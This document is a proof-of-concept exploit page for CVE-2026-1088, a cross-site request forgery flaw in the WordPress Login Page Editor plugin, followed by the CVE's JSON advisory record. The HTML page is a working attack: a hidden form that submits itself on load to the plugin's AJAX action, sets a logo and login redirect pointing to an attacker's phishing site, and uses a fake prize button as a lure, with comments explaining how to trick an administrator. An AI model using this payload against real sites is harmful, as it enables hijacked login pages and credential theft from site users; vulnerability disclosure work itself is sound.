CVE-2026-1088

<!-- CSRF PoC for CVE-2026-1088 --> <!-- Login Page Editor < 1.2 CSRF Vulnerability --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2026-1088</title> </head> <body> <h1>CSRF PoC for Login Page Editor Plugin</h1> <p>Click the button below to trigger the attack (requires admin to be logged in)</p> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="devotion_loginform_process"> <input type="hidden" name="logof" value="https://attacker.com/malicious-logo.png"> <input type="hidden" name="bg_color" value="#000000"> <input type="hidden" name="redirect_url" value="https://attacker.com/phishing-page"> <input type="hidden" name="error_msg" value="Your session has expired, please login again"> <button type="submit" id="attackBtn">Click for FREE Prize!</button> </form> <script> // Auto-submit form after page load (for demonstration) document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Description: 1. This PoC exploits the lack of nonce validation in devotion_loginform_process() 2. Attacker hosts this page and tricks WordPress admin into visiting it 3. When admin clicks the button, a forged request is sent to update plugin settings 4. The malicious logo and redirect URL can be used for phishing attacks 5. This modifies the login page appearance to steal credentials -->

{"cve": {"id": "CVE-2026-1088", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:08.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Login Page Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing nonce validation on the devotion_loginform_process() AJAX action. This makes it possible for unauthenticated attackers to update the plugin's login page settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Login Page Editor para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.2, inclusive. Esto se debe a la falta de validación de nonce en la acción AJAX devotion_loginform_process(). Esto hace posible que atacantes no autenticados actualicen la configuración de la página de inicio de sesión del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/login-page-editor/tags/1.2/class/devotion.core.class.php#L50", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/login-page-editor/trunk/class/devotion.core.class.php#L50", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f428b90d-8830-445d-b1f1-d8f860dae5cf?source=cve", "source": "[email protected]"}]}}